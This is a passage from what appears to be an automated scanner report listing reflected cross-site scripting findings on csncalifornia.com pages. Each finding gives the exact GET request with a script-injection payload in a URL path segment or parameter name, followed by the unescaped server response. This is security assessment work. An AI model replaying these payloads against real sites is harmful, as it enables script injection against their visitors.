<form ID='formInvisible' action="/12/177c56c"><script>alert(1)</script>220a7b4481e/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html">
...[SNIP]...

2.288. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbf9a"><script>alert(1)</script>9fa4ced9eea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10dbf9a"><script>alert(1)</script>9fa4ced9eea/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56136

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10dbf9a"><script>alert(1)</script>9fa4ced9eea/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html">
...[SNIP]...

2.289. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d49d7"><script>alert(1)</script>e38d6015248 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/img-srchttpcsnbayareacomcommonglobal_imad49d7"><script>alert(1)</script>e38d6015248/landing_niners.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56136

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/img-srchttpcsnbayareacomcommonglobal_imad49d7"><script>alert(1)</script>e38d6015248/landing_niners.html">
...[SNIP]...

2.290. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dd1c"><script>alert(1)</script>15f5d0d33ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_niners.html?5dd1c"><script>alert(1)</script>15f5d0d33ee=1 HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56118

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="5dd1c"><script>alert(1)</script>15f5d0d33ee" id = "5dd1c">
...[SNIP]...

2.291. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6869b"><script>alert(1)</script>000a9b1121d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /126869b"><script>alert(1)</script>000a9b1121d/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35831

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/126869b"><script>alert(1)</script>000a9b1121d/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html">
...[SNIP]...

2.292. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd392"><script>alert(1)</script>4228a606950 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17bd392"><script>alert(1)</script>4228a606950/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35831

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17bd392"><script>alert(1)</script>4228a606950/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html">
...[SNIP]...

2.293. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c24c3"><script>alert(1)</script>c3d877227e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10c24c3"><script>alert(1)</script>c3d877227e/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35830

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10c24c3"><script>alert(1)</script>c3d877227e/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html">
...[SNIP]...

2.294. http://www.csncalifornia.com/12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/17/10/img-srchttpcsnbayareacomcommonglobal_ima/landing_ratto_v3.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e040b"><script>alert(1)</script>789aa30996e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/img-srchttpcsnbayareacomcommonglobal_imae040b"><script>alert(1)</script>789aa30996e/landing_ratto_v3.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35831

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/17/10/img-srchttpcsnbayareacomcommonglobal_imae040b"><script>alert(1)</script>789aa30996e/landing_ratto_v3.html">
...[SNIP]...

2.295. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3923"><script>alert(1)</script>acbc9e62deb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12c3923"><script>alert(1)</script>acbc9e62deb/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12c3923"><script>alert(1)</script>acbc9e62deb/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html">
...[SNIP]...

2.296. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88f07"><script>alert(1)</script>1832d58f02c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/1988f07"><script>alert(1)</script>1832d58f02c/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/1988f07"><script>alert(1)</script>1832d58f02c/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html">
...[SNIP]...

2.297. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63da3"><script>alert(1)</script>5b4a5dabb83 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/1063da3"><script>alert(1)</script>5b4a5dabb83/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19/1063da3"><script>alert(1)</script>5b4a5dabb83/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html">
...[SNIP]...

2.298. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb769"><script>alert(1)</script>64364a421db was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-oveeb769"><script>alert(1)</script>64364a421db/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-oveeb769"><script>alert(1)</script>64364a421db/landing.html">
...[SNIP]...

2.299. http://www.csncalifornia.com/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32759"><script>alert(1)</script>463a885a6be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.html?32759"><script>alert(1)</script>463a885a6be=1 HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51651

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<input type=hidden name="32759"><script>alert(1)</script>463a885a6be" id = "32759">
...[SNIP]...

2.300. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac172"><script>alert(1)</script>0408d2ed618 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12ac172"><script>alert(1)</script>0408d2ed618/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12ac172"><script>alert(1)</script>0408d2ed618/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html">
...[SNIP]...

2.301. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dfb3"><script>alert(1)</script>f17ff8cf738 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/197dfb3"><script>alert(1)</script>f17ff8cf738/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/197dfb3"><script>alert(1)</script>f17ff8cf738/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html">
...[SNIP]...

2.302. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9592b"><script>alert(1)</script>a5a8ccaaf27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/109592b"><script>alert(1)</script>a5a8ccaaf27/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:32:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
...[SNIP]...
<form ID='formInvisible' action="/12/19/109592b"><script>alert(1)</script>a5a8ccaaf27/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html">
...[SNIP]...

2.303. http://www.csncalifornia.com/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csncalifornia.com
Path:   /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac109"><script>alert(1)</script>146cc501890 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowlac109"><script>alert(1)</script>146cc501890/landing.html HTTP/1.1
Host: www.csncalifornia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235107347.1292783233.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=368c522f782b4bfbdae223a1218f63d8; __utma=235107347.546650351.1292783233.1292783233.1292783233.1; __utmc=235107347; __utmb=235107347;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:32:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
